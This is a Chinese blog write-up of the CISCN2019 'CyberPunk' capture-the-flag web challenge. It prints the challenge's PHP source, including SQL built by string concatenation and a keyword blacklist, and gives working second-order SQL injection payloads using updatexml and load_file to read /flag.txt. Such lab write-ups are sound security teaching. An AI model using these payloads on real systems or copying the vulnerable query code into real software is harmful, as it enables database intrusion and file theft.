[CISCN2019 华北赛区 Day1 Web5]CyberPunk

最新推荐文章于 2021-05-13 15:38:20 发布
最新推荐文章于 2021-05-13 15:38:20 发布
阅读量292 收藏 1
点赞数 1
分类专栏: sql注入 代码审计 # ctf做题记录 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115365517
版权

题目场景
在这里插入图片描述
猜测是sql注入,读源码
在这里插入图片描述
发现底部有提示,尝试用伪协议读源码。

读到了index.php,delete.php,search.php,change.php,config.php,confirm.php。
精简后的源码如下:
index.php

<?php

ini_set('open_basedir', '/var/www/html/');

// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
    if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
        echo('no way!');
        exit;
    }
    @include($file);
}
?>

confirm.php

<?php

require_once "config.php";
//var_dump($_POST);

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = $_POST["address"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}
?>

change.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>
ێ

delete.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单删除成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

search.php

<?php

require_once "config.php"; 

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        if(!$row) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

config.php

<?php

ini_set("open_basedir", getcwd() . ":/etc:/tmp");

$DATABASE = array(

    "host" => "127.0.0.1",
    "username" => "root",
    "password" => "root",
    "dbname" =>"ctfusers"
);

$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);

源码中对user_name和phone都做了严格的正则过滤,但对address只是很简单的转义,所以重点应该是在address这里。
正好复习一下二次注入
在这里插入图片描述

但本人太菜了,忘了到用load_file()来解,参考大佬的wp。
payload

payload
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#

updatexml只能显示32个字符长度,所以要注入两次。
在提交订单里注入,在修改数据里读取。
在这里插入图片描述
在这里插入图片描述

再用第二个payload读后半部分就可以了。

不用报错注入也可以
payload
‘,`adress`=(select load_file(’/flag.txt’));#
在这里插入图片描述

再查询
在这里插入图片描述

fmyyy1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[CISCN2019 华北赛区 Day1 Web5]CyberPunk,网络安全核心知识点
m0_61549781的博客
04-06 802
在index.php页面的响应最下面可以发现提示了?file=?,猜测应该是个读取文件的点尝试伪协议读源码?把所有源码读到本地以后就是代码审计了,可以发现每个页面都对username和phone做了过滤但是并没有对address做过滤,只有在change.php页面对新提交的address做了特殊字符转义,但是还拼接了前一句的查询结果里的address值,这个值可是没有被黑名单过滤,而且还有 一个关键是做了if判断,如果上面的第一个查询结果正确,第二个结果报错就会将报错信息输出。
cyberpunk-web-page-webm
10-29
cyberpunk-web-page-webm
Cyberpunk2077_CYBERPUNK_CheatEngine_
09-29
This is the Cyberpunk Cheat table for the Cheat engine
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
02-05
cyberpunk-2019:emacs需要的Cyber​​punk主题,但也许不值得。
重新记忆Web版:重新:记忆Web
02-06
回复:_记住网络版
augmented-ui:赛博朋克风格的Web UI变得容易。 得到增强
04-13
http : //augmented-ui.com/v1/test.html unpkg: https ://unpkg.com/augmented-ui@1/augmented.css 安装: $ npm install augmented-ui /node_modules/augmented-ui/augmented-ui.min.css $ npm install ...
BUUCTF:[CISCN2019 华北赛区 Day1 Web5]CyberPunk
末初的CSDN博客
03-26 2228
F12查看源码,发现存在传参 尝试通过伪协议文件包含读取源码: http://467ceaa4-2e02-46f9-b14a-25ec91a65986.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=index.php 发现除了index.php还存在这几个php文件:confirm.php,delete.ph...
[CISCN2019 华北赛区 Day1 Web5]CyberPunk题解
lonmar的博客
02-02 880
前言 考察二次注入 有关这方面总结: 网鼎杯2018-commit题解&二次注入&addslashes安全问题&insert注入 题解 根据提示,读取代码 然后把代码都读出来,进行审计.在change.php,发现了address仅用addslashes进行处理,而且插入数据库中的address会在下次查询中插入到新的dal语句中,存在二次注入 然后尝试下MySQL insert语句特性 所以可以尝试构造payload: address=’,`address`=(sql语句.
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk
AndyNoel的博客
05-13 426
BUUCTF-[CISCN2019 华北赛区 Day1 Web5]CyberPunk 看题 看源码有提示?file=? 文件包含漏洞,可以利用这个漏洞读取源码。 分析 index.php?file=php://filter/read=convert.base64-encode/resource=change.php 挨个读取完后,base64解码后,在change.php发现了一点问题 <?php require_once "config.php"; if(!empty($_POST["us
用python的pillow写一个程序,将一个城市图片赛博朋克化
最新发布
05-11
cyberpunk_image = cyberpunk_image.filter(ImageFilter.CONTOUR) # 保存处理后的图片 cyberpunk_image.save('cyberpunk_city.jpg') ``` 这个程序将原始城市图片转换为黑白,添加噪点,反转颜色,最后应用赛博朋克...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值